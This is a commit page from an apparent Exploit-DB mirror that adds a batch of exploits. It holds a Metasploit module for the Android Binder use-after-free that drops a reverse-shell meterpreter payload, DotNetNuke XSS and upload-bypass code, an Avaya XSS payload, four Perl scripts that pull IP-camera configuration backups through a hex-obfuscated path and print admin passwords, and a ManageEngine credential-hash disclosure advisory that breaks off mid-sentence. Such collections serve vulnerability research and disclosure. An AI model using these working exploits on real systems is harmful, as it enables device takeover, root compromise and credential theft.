bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2020-02-25

Browse source 
22 changes to exploits/shellcodes

Quick N Easy Web Server 3.3.8 - Denial of Service (PoC)
Go SSH servers 0.0.2 - Denial of Service (PoC)
Android Binder - Use-After-Free (Metasploit)
Diamorphine Rootkit - Signal Privilege Escalation (Metasploit)

Apache James Server 2.3.2 - Insecure User Creation Arbitrary File Write (Metasploit)
Avaya IP Office Application Server 11.0.0.0 - Reflective Cross-Site Scripting
ESCAM QD-900 WIFI HD Camera - Remote Configuration Disclosure
Real Web Pentesting Tutorial Step by Step - [Persian]
AMSS++ v 4.31 - 'id' SQL Injection
SecuSTATION IPCAM-130 HD Camera - Remote Configuration Disclosure
CandidATS 2.1.0 - Cross-Site Request Forgery (Add Admin)
AMSS++ 4.7 - Backdoor Admin Account
SecuSTATION SC-831 HD Camera - Remote Configuration Disclosure
ATutor 2.2.4 - 'id' SQL Injection
I6032B-P POE 2.0MP Outdoor Camera - Remote Configuration Disclosure
ManageEngine EventLog Analyzer 10.0 - Information Disclosure
eLection 2.0 - 'id' SQL Injection
DotNetNuke 9.5 - Persistent Cross-Site Scripting
DotNetNuke 9.5 - File Upload Restrictions Bypass
Aptina AR0130 960P 1.3MP Camera - Remote Configuration Disclosure
Cacti 1.2.8 - Remote Code Execution

Windows\x86 - Null-Free WinExec Calc.exe Shellcode (195 bytes)
This commit is contained in:
Offensive Security 2020-02-25 05:01:52 +00:00
parent ed6caf0837
commit cf92ea269e
24 changed files with 1597 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

67
exploits/android/local/48129.rb Executable file
View file

@ -0,0 +1,67 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Post::Common
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info={})
super( update_info( info, {
'Name' => "Android Binder Use-After-Free Exploit",
'Description' => %q{
},
'License' => MSF_LICENSE,
'Author' => [
'Jann Horn', # discovery and exploit
'Maddie Stone', # discovery and exploit
'grant-h', # Qu1ckR00t
'timwr', # metasploit module
],
'References' => [
[ 'CVE', '2019-2215' ],
[ 'URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1942' ],
[ 'URL', 'https://hernan.de/blog/2019/10/15/tailoring-cve-2019-2215-to-achieve-root/' ],
[ 'URL', 'https://github.com/grant-h/qu1ckr00t/blob/master/native/poc.c' ],
],
'DisclosureDate' => "Sep 26 2019",
'SessionTypes' => [ 'meterpreter' ],
'Platform' => [ "android", "linux" ],
'Arch' => [ ARCH_AARCH64 ],
'Targets' => [[ 'Auto', {} ]],
'DefaultOptions' =>
{
'PAYLOAD' => 'linux/aarch64/meterpreter/reverse_tcp',
'WfsDelay' => 5,
},
'DefaultTarget' => 0,
}
))
end
def upload_and_chmodx(path, data)
write_file path, data
chmod(path)
register_file_for_cleanup(path)
end
def exploit
local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2019-2215", "exploit" )
exploit_data = File.read(local_file, {:mode => 'rb'})
workingdir = session.fs.dir.getwd
exploit_file = "#{workingdir}/.#{Rex::Text::rand_text_alpha_lower(5)}"
upload_and_chmodx(exploit_file, exploit_data)
payload_file = "#{workingdir}/.#{Rex::Text::rand_text_alpha_lower(5)}"
upload_and_chmodx(payload_file, generate_payload_exe)
print_status("Executing exploit '#{exploit_file}'")
result = cmd_exec("echo '#{payload_file} &' | #{exploit_file}")
print_status("Exploit result:\n#{result}")
end
end

21
exploits/aspx/webapps/48124.txt Normal file
View file

@ -0,0 +1,21 @@
# Exploit Title: DotNetNuke 9.5 - Persistent Cross-Site Scripting
# Date: 2020-02-23
# Exploit Author: Sajjad Pourali
# Vendor Homepage: http://dnnsoftware.com/
# Software Link: https://github.com/dnnsoftware/Dnn.Platform/releases/download/v9.5.0/DNN_Platform_9.5.0_Install.zip
# Version: <= 9.5
# CVE : N/A
# More Info: https://medium.com/@SajjadPourali/dnn-dotnetnuke-cms-not-as-secure-as-you-think-e8516f789175
DNN allows normal users to upload XML files by using journal tools in their profile. An attacker could upload XML files which may execute malicious scripts in the users browser.
In XML, a namespace is an identifier used to distinguish between XML element names and attribute names which might be the same. One of the standard namespaces is “http://www.w3.org/1999/xhtml” which permits us to run XHTML tags such as <script>.
For instance, uploading the following code as an XML file executes javascript and shows a non-harmful XSS alert.
<?xml version="1.0" encoding="UTF-8"?>
<script xmlns="http://www.w3.org/1999/xhtml">
alert('XSS');
</script>
Though stealing of authentication cookies are not possible at this time (because the authentications cookies are set as HttpOnly by default), XSS attacks are not limited to stealing users cookies. Using XSS vulnerability, an attacker can perform other more damaging attacks on other or high privileged users, for example, bypassing CSRF protections which allows uploading “aspx” extension files through settings page which leads to upload of backdoor files.

70
exploits/aspx/webapps/48125.txt Normal file
View file

@ -0,0 +1,70 @@
# Exploit Title: DotNetNuke 9.5 - File Upload Restrictions Bypass
# Date: 2020-02-23
# Exploit Author: Sajjad Pourali
# Vendor Homepage: http://dnnsoftware.com/
# Software Link: https://github.com/dnnsoftware/Dnn.Platform/releases/download/v9.5.0/DNN_Platform_9.5.0_Install.zip
# Version: <= 9.5
# CVE : N/A
# More Info: https://medium.com/@SajjadPourali/dnn-dotnetnuke-cms-not-as-secure-as-you-think-e8516f789175
The DNN has a file upload module for superuser. As a superuser, you can upload files with the following formats — “jpg, jpeg, jpe, gif, bmp, png, svg, ttf, eot, woff, doc, docx, xls, xlsx, ppt, pptx, pdf, txt, xml, xsl, xsd, css, zip, rar, template, htmtemplate, ico, avi, mpg, mpeg, mp3, wmv, mov, wav, mp4, webm, ogv”.
As a normal user you are allowed to upload files with “bmp,gif,ico,jpeg,jpg,jpe,png,svg” extensions. The same file upload module used for superuser is reused for normal users with extra validation for a few additional extensions e.g. CSS extension is not allowed.
Unfortunately, only for superuser, whitelisted extension check is performed at the server end. For normal users, extra extension validation is performed at client-side only. Hence, a low privileged normal user can bypass the client-side validation and upload files with extensions which are allowed only for superuser only.
For example, a normal privileged user can upload a file with extension which is allowed only for superuser, by executing the following code on a browsers console (in the tab that manages profiles page has opened). This attack may also be performed using proxy tools such as Burp, ZAP etc.
dnn.createFileUpload({
"clientId": "dnn_ctr_EditUser_Profile_ProfileProperties_Photo_PhotoFileControl_FileUploadControl",
"moduleId": "",
"parentClientId": null,
"showOnStartup": true,
"folderPicker": {
"selectedItemCss": "selected-item",
"internalStateFieldId": null,
"disabled": false,
"selectItemDefaultText": "",
"initialState": {
"selectedItem": {
"key": "0",
"value": "My Folder"
}
},
"onSelectionChanged": []
},
"maxFileSize": 299892736,
"maxFiles": 0,
"extensions": ["jpg", "jpeg", "jpe", "gif", "bmp", "png", "svg", "ttf", "eot", "woff", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "pdf", "txt", "xml", "xsl", "xsd", "css", "zip", "rar", "template", "htmtemplate", "ico", "avi", "mpg", "mpeg", "mp3", "wmv", "mov", "wav", "mp4", "webm", "ogv"],
"resources": {
"title": "Upload Files",
"decompressLabel": "Decompress Zip Files",
"uploadToFolderLabel": "Upload To:",
"dragAndDropAreaTitle": "Drag files here or click to browse",
"uploadFileMethod": "Upload File",
"uploadFromWebMethod": "From URL",
"closeButtonText": "Close",
"uploadFromWebButtonText": "Upload",
"decompressingFile": "Decompressing File",
"fileIsTooLarge": "File size bigger than 286. Mb",
"fileUploadCancelled": "Upload cancelled",
"fileUploadFailed": "Upload failed",
"fileUploaded": "File uploaded",
"emptyFileUpload": "Your browser does not support empty file uploads.",
"fileAlreadyExists": "The file you want to upload already exists in this folder.",
"uploadStopped": "File upload stopped",
"urlTooltip": "Enter Resource URL like https://SomeWebSite.com/Images/About.png",
"keepButtonText": "Keep",
"replaceButtonText": "Replace",
"tooManyFiles": "You cannot upload more than {0} file(s) at once.",
"invalidFileExtensions": "Some selected files with invalid extensions are excluded from upload. You can only upload files with the following extensions: bmp, gif, ico, jpeg, jpg, jpe, png, svg.",
"unzipFilePromptTitle": "Unzip Information",
"unzipFileFailedPromptBody": "<div class=\"invalidFiles\"><p>[COUNT] of [TOTAL] file(s) were not extracted because their file types are not supported:</p>[FILELIST]</div>",
"unzipFileSuccessPromptBody": "<div class=\"validFiles\"><p>[TOTAL] of [TOTAL] file(s) were extracted successfully.</p></div>",
"errorDialogTitle": "Error"
},
"width": 780,
"height": 630,
"folderPath": dnn.dnnFileUpload.settings.dnn_ctr_EditUser_Profile_ProfileProperties_Photo_PhotoFileControl_dnnFileUploadScope.folder,
"parameters": {}
});

17
exploits/hardware/webapps/48105.txt Normal file
View file

@ -0,0 +1,17 @@
# Exploit Title: Avaya IP Office Application Server 11.0.0.0 - Reflective Cross-Site Scripting
# Release Date: 2019-12-11
# Exploit Authors: Dan Bohan, Scott Goodwin, OCD Tech
# Vendor Homepage: https://www.avaya.com/en/
# Software Link: https://www.avaya.com/en/products/unified-communications/voip/
# Vulnerable Version: 11.0 FP4 SP1 and before
# Tested on: 11.0.0.0
# CVE: CVE-2019-7004
# Vendor Advisory: ASA-2019-213
# References: https://downloads.avaya.com/css/P8/documents/101062833
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7004
Avaya IP Office version 11.0.0.0 and before has a vulnerable login page (username) which is susceptible to cross-site scripting (XSS) via a POST request due to improper sanitization of user input. XSS via a post request allows for arbitrary code to be executed on the clients system in the security context of the browser. By submitting a specially crafted username, it is possible to execute arbitrary JavaScript.
# PoC
Username: 41529%22%2F%3E%0A%3Cscript%3Ealert%28%27XSS%21%27%29%3B%3C%2Fscript%3E
Password: Anything

92
exploits/hardware/webapps/48107.pl Executable file
View file

@ -0,0 +1,92 @@
# Title: ESCAM QD-900 WIFI HD Camera - Remote Configuration Disclosure
# Author: Todor Donev
# Date: 2020-02-23
# Vendor: www.escam.cn
# Product Link: http://www.escam.cn/search/?class1=&class2=&class3=&searchtype=0&searchword=qd-900&lang=en
# CVE: N/A
#!/usr/bin/perl
#
# ESCAM QD-900 WIFI HD Camera Remote Configuration Disclosure
#
# Copyright 2020 (c) Todor Donev
#
# https://donev.eu/
#
# Disclaimer:
# This or previous programs are for Educational purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
# caused by direct or indirect use of the information or functionality provided by these programs.
# The author or any Internet provider bears NO responsibility for content or misuse of these programs
# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# (Dont do anything without permissions)
#
# [ ESCAM QD-900 WIFI HD Camera Remote Configuration Disclosure
# [ ===========================================================
# [ Exploit Author: Todor Donev 2020 <todor.donev@gmail.com>
# [ Initializing the browser
# [ >> User-Agent => Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.7.5) Gecko/20050105 Epiphany/1.4.8
# [ >> Content-Type => application/x-www-form-urlencoded
# [ << Connection => close
# [ << Date => Fri, 21 Feb 2020 20:23:56 GMT
# [ << Accept-Ranges => bytes
# [ << Server => thttpd/2.25b 29dec2003
# [ << Content-Length => 25003
# [ << Content-Type => application/octet-stream
# [ << Last-Modified => Fri, 21 Feb 2020 20:23:55 GMT
# [ << Client-Date => Fri, 21 Feb 2020 20:23:57 GMT
# [ << Client-Peer => 192.168.1.105:8000
# [ << Client-Response-Num => 1
# [
# [ Username : admin
# [ Password : admin
use strict;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;
use Gzip::Faster 'gunzip';
my $host = shift || ''; # Full path url to the store
my $cmd = shift || ''; # show - Show configuration dump
$host =~ s/\/$//;
print "\033[2J"; #clear the screen
print "\033[0;0H"; #jump to 0,0
print "[ ESCAM QD-900 WIFI HD Camera Remote Configuration Disclosure\n";
print "[ ===========================================================\n";
print "[ Exploit Author: Todor Donev 2020 <todor.donev\@gmail.com>\n";
if ($host !~ m/^http/){
print "[ Usage, Password Disclosure: perl $0 https://target:port/\n";
print "[ Usage, Show Configuration : perl $0 https://target:port/ show\n";
exit;
}
print "[ Initializing the browser\n";
my $user_agent = rand_ua("browsers");
my $browser = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 });
$browser->timeout(30);
$browser->agent($user_agent);
# my $target = $host."/tmpfs/config_backup.bin";
my $target = $host."\x2f\x77\x65\x62\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x68\x69\x33\x35\x31\x30\x2f\x62\x61\x63\x6b\x75\x70\x2e\x63\x67\x69";
my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded"]);
my $response = $browser->request($request) or die "[ Exploit Failed: $!";
print "[ >> $_ => ", $request->header($_), "\n" for $request->header_field_names;
print "[ << $_ => ", $response->header($_), "\n" for $response->header_field_names;
print "[ Exploit failed! Not vulnerable.\n" and exit if ($response->code ne 200);
my $gzipped = $response->content();
my $config = gunzip($gzipped);
print "[ \n";
if ($cmd =~ /show/) {
print "[ >> Configuration dump...\n[\n";
print "[ ", $_, "\n" for split(/\n/,$config);
exit;
} else {
print "[ Username : ", $1, "\n" if ($config =~ /username=(.*)/);
print "[ Password : ", $1, "\n" if ($config =~ /password=(.*)/);
exit;
}

92
exploits/hardware/webapps/48110.txt Normal file
View file

@ -0,0 +1,92 @@
# Exploit Title: SecuSTATION IPCAM-130 HD Camera - Remote Configuration Disclosure
# Author: Todor Donev
# Date: 2020-02-23
# Vendor: https://secu.jp/
# Product Link: https://secu.jp/support/831nh1.html
# CVE: N/A
#
# SecuSTATION IPCAM-130 HD Camera Remote Configuration Disclosure
#
# Copyright 2020 (c) Todor Donev
#
# https://donev.eu/
#
# Disclaimer:
# This or previous programs are for Educational purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
# caused by direct or indirect use of the information or functionality provided by these programs.
# The author or any Internet provider bears NO responsibility for content or misuse of these programs
# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# (Dont do anything without permissions)
#
# [ SecuSTATION IPCAM-130 HD Camera Remote Configuration Disclosure
# [ ===============================================================
# [ Exploit Author: Todor Donev 2020 <todor.donev@gmail.com>
# [ Initializing the browser
# [ >> User-Agent => Mozilla/5.0 (compatible; Konqueror/3.5; NetBSD 4.0_RC3; X11) KHTML/3.5.7 (like Gecko)
# [ >> Content-Type => application/x-www-form-urlencoded
# [ << Connection => close
# [ << Date => Fri, 21 Feb 2020 21:11:37 GMT
# [ << Accept-Ranges => bytes
# [ << Server => thttpd/2.25b 29dec2003
# [ << Content-Length => 32333
# [ << Content-Type => application/octet-stream
# [ << Last-Modified => Fri, 21 Feb 2020 21:11:36 GMT
# [ << Client-Date => Fri, 21 Feb 2020 21:12:23 GMT
# [ << Client-Peer => 192.168.100.200:81
# [ << Client-Response-Num => 1
# [
# [ Username : admin
# [ Password : admin
#!/usr/bin/perl
use strict;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;
use Gzip::Faster 'gunzip';
my $host = shift || ''; # Full path url to the store
my $cmd = shift || ''; # show - Show configuration dump
$host =~ s/\/$//;
print "\033[2J"; #clear the screen
print "\033[0;0H"; #jump to 0,0
print "[ SecuSTATION IPCAM-130 HD Camera Remote Configuration Disclosure\n";
print "[ ===============================================================\n";
print "[ Exploit Author: Todor Donev 2020 <todor.donev\@gmail.com>\n";
if ($host !~ m/^http/){
print "[ Usage, Password Disclosure: perl $0 https://target:port/\n";
print "[ Usage, Show Configuration : perl $0 https://target:port/ show\n";
exit;
}
print "[ Initializing the browser\n";
my $user_agent = rand_ua("browsers");
my $browser = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 });
$browser->timeout(30);
$browser->agent($user_agent);
# my $target = $host."/tmpfs/config_backup.bin";
my $target = $host."\x2f\x77\x65\x62\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x68\x69\x33\x35\x31\x30\x2f\x62\x61\x63\x6b\x75\x70\x2e\x63\x67\x69";
my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded"]);
my $response = $browser->request($request) or die "[ Exploit Failed: $!";
print "[ >> $_ => ", $request->header($_), "\n" for $request->header_field_names;
print "[ << $_ => ", $response->header($_), "\n" for $response->header_field_names;
print "[ Exploit failed! Not vulnerable.\n" and exit if ($response->code ne 200);
my $gzipped = $response->content();
my $config = gunzip($gzipped);
print "[ \n";
if ($cmd =~ /show/) {
print "[ >> Configuration dump...\n[\n";
print "[ ", $_, "\n" for split(/\n/,$config);
exit;
} else {
print "[ Username : ", $1, "\n" if ($config =~ /username=(.*)/);
print "[ Password : ", $1, "\n" if ($config =~ /password=(.*)/);
exit;
}

91
exploits/hardware/webapps/48115.pl Executable file
View file

@ -0,0 +1,91 @@
# Exploit Title: SecuSTATION SC-831 HD Camera - Remote Configuration Disclosure
# Author: Todor Donev
# Date: 2020-02-23
# Vendor: https://secu.jp/
# Product Link: https://secu.jp/support/831.html
# CVE: N/A
#!/usr/bin/perl
#
# SecuSTATION SC-831 HD Camera Remote Configuration Disclosure
#
# Copyright 2020 (c) Todor Donev
#
# https://donev.eu/
#
# Disclaimer:
# This or previous programs are for Educational purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
# caused by direct or indirect use of the information or functionality provided by these programs.
# The author or any Internet provider bears NO responsibility for content or misuse of these programs
# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# (Dont do anything without permissions)
#
# [ SecuSTATION SC-831 HD Camera Remote Configuration Disclosure
# [ ============================================================
# [ Exploit Author: Todor Donev 2020 <todor.donev@gmail.com>
# [ Initializing the browser
# [ >> User-Agent => Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b3pre) Gecko/20081208 SeaMonkey/2.0a3pre
# [ >> Content-Type => application/x-www-form-urlencoded
# [ << Connection => close
# [ << Date => Fri, 21 Feb 2020 20:36:59 GMT
# [ << Accept-Ranges => bytes
# [ << Server => thttpd/2.25b 29dec2003
# [ << Content-Length => 25760
# [ << Content-Type => application/octet-stream
# [ << Last-Modified => Fri, 21 Feb 2020 20:36:57 GMT
# [ << Client-Date => Fri, 21 Feb 2020 20:37:01 GMT
# [ << Client-Peer => 192.168.1.208:80
# [ << Client-Response-Num => 1
# [
# [ Username : admin
# [ Password : admin
use strict;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;
use Gzip::Faster 'gunzip';
my $host = shift || ''; # Full path url to the store
my $cmd = shift || ''; # show - Show configuration dump
$host =~ s/\/$//;
print "\033[2J"; #clear the screen
print "\033[0;0H"; #jump to 0,0
print "[ SecuSTATION SC-831 HD Camera Remote Configuration Disclosure\n";
print "[ ============================================================\n";
print "[ Exploit Author: Todor Donev 2020 <todor.donev\@gmail.com>\n";
if ($host !~ m/^http/){
print "[ Usage, Password Disclosure: perl $0 https://target:port/\n";
print "[ Usage, Show Configuration : perl $0 https://target:port/ show\n";
exit;
}
print "[ Initializing the browser\n";
my $user_agent = rand_ua("browsers");
my $browser = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 });
$browser->timeout(30);
$browser->agent($user_agent);
# my $target = $host."/tmpfs/config_backup.bin";
my $target = $host."\x2f\x77\x65\x62\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x68\x69\x33\x35\x31\x30\x2f\x62\x61\x63\x6b\x75\x70\x2e\x63\x67\x69";
my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded"]);
my $response = $browser->request($request) or die "[ Exploit Failed: $!";
print "[ >> $_ => ", $request->header($_), "\n" for $request->header_field_names;
print "[ << $_ => ", $response->header($_), "\n" for $response->header_field_names;
print "[ Exploit failed! Not vulnerable.\n" and exit if ($response->code ne 200);
my $gzipped = $response->content();
my $config = gunzip($gzipped);
print "[ \n";
if ($cmd =~ /show/) {
print "[ >> Configuration dump...\n[\n";
print "[ ", $_, "\n" for split(/\n/,$config);
exit;
} else {
print "[ Username : ", $1, "\n" if ($config =~ /username=(.*)/);
print "[ Password : ", $1, "\n" if ($config =~ /password=(.*)/);
exit;
}

91
exploits/hardware/webapps/48118.txt Normal file
View file

@ -0,0 +1,91 @@
# Exploit Title: I6032B-P POE 2.0MP Outdoor Camera - Remote Configuration Disclosure
# Author: Todor Donev
# Date: 2020-02-23
# Vendor: https://www.revotec.com/
# Product Link:
# CVE: N/A
#!/usr/bin/perl
#
# Revotech I6032B-P POE 1920x1080P 2.0MP Outdoor Camera Remote Configuration Disclosure
#
# Copyright 2020 (c) Todor Donev
#
# https://donev.eu/
#
# Disclaimer:
# This or previous programs are for Educational purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
# caused by direct or indirect use of the information or functionality provided by these programs.
# The author or any Internet provider bears NO responsibility for content or misuse of these programs
# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# (Dont do anything without permissions)
#
# [ Revotech I6032B-P POE 1920x1080P 2.0MP Outdoor Camera Remote Configuration Disclosure
# [ =====================================================================================
# [ Exploit Author: Todor Donev 2020 <todor.donev@gmail.com> -- https://donev.eu/
# [ Initializing the browser
# [ >> User-Agent => Emacs-W3/4.0pre.46 URL/p4.0pre.46 (i686-pc-linux; X11)
# [ >> Content-Type => application/x-www-form-urlencoded
# [ << Connection => close
# [ << Date => Sun, 23 Feb 2020 10:57:32 GMT
# [ << Accept-Ranges => bytes
# [ << Server => thttpd/2.25b 29dec2003
# [ << Content-Length => 23876
# [ << Content-Type => application/octet-stream
# [ << Last-Modified => Sun, 23 Feb 2020 10:57:32 GMT
# [ << Client-Date => Sun, 23 Feb 2020 10:57:44 GMT
# [ << Client-Response-Num => 1
# [
# [ Username : admin
# [ Password : admin
use strict;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;
use Gzip::Faster 'gunzip';
my $host = shift || ''; # Full path url to the store
my $cmd = shift || ''; # show - Show configuration dump
$host =~ s/\/$//;
print "\033[2J"; #clear the screen
print "\033[0;0H"; #jump to 0,0
print "[ Revotech I6032B-P POE 1920x1080P 2.0MP Outdoor Camera Remote Configuration Disclosure\n";
print "[ =====================================================================================\n";
print "[ Exploit Author: Todor Donev 2020 <todor.donev\@gmail.com> -- https://donev.eu/\n";
if ($host !~ m/^http/){
print "[ Usage, Password Disclosure: perl $0 https://target:port/\n";
print "[ Usage, Show Configuration : perl $0 https://target:port/ show\n";
exit;
}
print "[ Initializing the browser\n";
my $user_agent = rand_ua("browsers");
my $browser = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 });
$browser->timeout(30);
$browser->agent($user_agent);
# my $target = $host."/config_backup.bin";
# my $target = $host."/tmpfs/config_backup.bin";
my $target = $host."\x2f\x77\x65\x62\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x68\x69\x33\x35\x31\x30\x2f\x62\x61\x63\x6b\x75\x70\x2e\x63\x67\x69";
my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded"]);
my $response = $browser->request($request) or die "[ Exploit Failed: $!";
print "[ >> $_ => ", $request->header($_), "\n" for $request->header_field_names;
print "[ << $_ => ", $response->header($_), "\n" for $response->header_field_names;
print "[ Exploit failed! Not vulnerable.\n" and exit if ($response->code ne 200);
my $gzipped = $response->content();
my $config = gunzip($gzipped);
print "[ \n";
if ($cmd =~ /show/) {
print "[ >> Configuration dump...\n[\n";
print "[ ", $_, "\n" for split(/\n/,$config);
exit;
} else {
print "[ Username : ", $1, "\n" if ($config =~ /username=(.*)/);
print "[ Password : ", $1, "\n" if ($config =~ /password=(.*)/);
exit;
}

92
exploits/hardware/webapps/48127.pl Executable file
View file

@ -0,0 +1,92 @@
# Exploit Title: Aptina AR0130 960P 1.3MP Camera - Remote Configuration Disclosure
# Author: Todor Donev
# Date: 2020-02-23
# Vendor: https://acesecurity.jp
# Product Link: https://acesecurity.jp/support/top/wip_series/wip-90113
# CVE: N/A
#!/usr/bin/perl
#
# ACE SECURITY WiP-90113 HD Camera Remote Configuration Disclosure
#
# Copyright 2020 (c) Todor Donev
#
# https://donev.eu/
#
# Disclaimer:
# This or previous programs are for Educational purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
# caused by direct or indirect use of the information or functionality provided by these programs.
# The author or any Internet provider bears NO responsibility for content or misuse of these programs
# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# (Dont do anything without permissions)
#
# [ ACE SECURITY WiP-90113 HD Camera Remote Configuration Disclosure
# [ ================================================================
# [ Exploit Author: Todor Donev 2020 <todor.donev@gmail.com>
# [ Initializing the browser
# [ >> User-Agent => Mozilla/5.0 (compatible; Konqueror/3.5; NetBSD 4.0_RC3; X11) KHTML/3.5.7 (like Gecko)
# [ >> Content-Type => application/x-www-form-urlencoded
# [ << Connection => close
# [ << Date => Sat, 22 Feb 2020 14:10:01 GMT
# [ << Accept-Ranges => bytes
# [ << Server => thttpd/2.25b 29dec2003
# [ << Content-Length => 25893
# [ << Content-Type => application/octet-stream
# [ << Last-Modified => Sat, 22 Feb 2020 14:10:00 GMT
# [ << Client-Date => Sat, 22 Feb 2020 14:10:04 GMT
# [ << Client-Peer => 192.168.200.49:8080
# [ << Client-Response-Num => 1
# [
# [ Username : admin
# [ Password : admin
use strict;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;
use Gzip::Faster 'gunzip';
my $host = shift || ''; # Full path url to the store
my $cmd = shift || ''; # show - Show configuration dump
$host =~ s/\/$//;
print "\033[2J"; #clear the screen
print "\033[0;0H"; #jump to 0,0
print "[ ACE SECURITY WiP-90113 HD Camera Remote Configuration Disclosure\n";
print "[ ================================================================\n";
print "[ Exploit Author: Todor Donev 2020 <todor.donev\@gmail.com>\n";
if ($host !~ m/^http/){
print "[ Usage, Password Disclosure: perl $0 https://target:port/\n";
print "[ Usage, Show Configuration : perl $0 https://target:port/ show\n";
exit;
}
print "[ Initializing the browser\n";
my $user_agent = rand_ua("browsers");
my $browser = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 });
$browser->timeout(30);
$browser->agent($user_agent);
# my $target = $host."/config_backup.bin";
# my $target = $host."/tmpfs/config_backup.bin";
my $target = $host."\x2f\x77\x65\x62\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x68\x69\x33\x35\x31\x30\x2f\x62\x61\x63\x6b\x75\x70\x2e\x63\x67\x69";
my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded"]);
my $response = $browser->request($request) or die "[ Exploit Failed: $!";
print "[ >> $_ => ", $request->header($_), "\n" for $request->header_field_names;
print "[ << $_ => ", $response->header($_), "\n" for $response->header_field_names;
print "[ Exploit failed! Not vulnerable.\n" and exit if ($response->code ne 200);
my $gzipped = $response->content();
my $config = gunzip($gzipped);
print "[ \n";
if ($cmd =~ /show/) {
print "[ >> Configuration dump...\n[\n";
print "[ ", $_, "\n" for split(/\n/,$config);
exit;
} else {
print "[ Username : ", $1, "\n" if ($config =~ /username=(.*)/);
print "[ Password : ", $1, "\n" if ($config =~ /password=(.*)/);
exit;
}

79
exploits/java/webapps/48119.txt Normal file
View file

@ -0,0 +1,79 @@
# Exploit Title: ManageEngine EventLog Analyzer 10.0 - Information Disclosure
# Date: 2020-02-23
# Author:Scott Goodwin
# Vendor: https://www.manageengine.com/
# Software Link: https://www.manageengine.com/products/eventlog/
# CVE: CVE-2019-19774
Vulnerability Name: Authenticated Information Disclosure in ManageEngine EventLog Analyzer
Registered: CVE-2019-19774
Discoverer:
Scott Goodwin, OSCP
OCD Tech
Vendor of Product:
ManageEngine
Affected Product Code Base:
EventLog Analyzer - 10.0 SP1
Affected Component:
Affected ManageEngine endpoint: http://exampleclient:8400/event/runquery.do
This endpoint allows the ManageEngine user to execute commands against the
ManageEngine PostgreSQL database.
Attack Type:
Remote
Vulnerability Type:
Incorrect Access Control
Vulnerability Impact:
Authenticated Information Disclosure
Attack Vector:
To exploit the vulnerability, an authenticated user must execute a specially crafted
query against the ManageEngine database to bypass the built-in security controls and
extract credential data.
Vulnerability Description:
An issue was discovered in Zoho ManageEngine EventLog Analyzer 10.0 SP1.
By running "select hostdetails from hostdetails" at the /event/runquery.do endpoint,
it is possible to bypass the security restrictions that prevent even administrative
users from viewing credential data stored in the database, and recover the MD5 hashes
of the accounts used to authenticate the ManageEngine platform to the managed machines
on the network (most often administrative accounts). Specifically, this bypasses the
following restrictions: a query cannot mention "password", and a query result cannot
have a "password" column.
PoC: Run the database query: "select hostdetails from hostdetails" at the /event/runquery.do endpoint
Reporting Timeline:
10/30/2019: This vulnerability was reported to ManageEngine via the
Zoho/ManageEngine Bug Bounty program. They acknowledged the initial report.
12/12/2019: Vulnerability registered
12/13/2019: Vulnerability acknowledged and update (12110) made available to ManageEngine
customers.
12/13/2019: Public disclosure
Additional Information:
This query bypasses the following security restrictions implemented within Manage Engine:
1. restrictions on queries that include the word "password". This query will output the
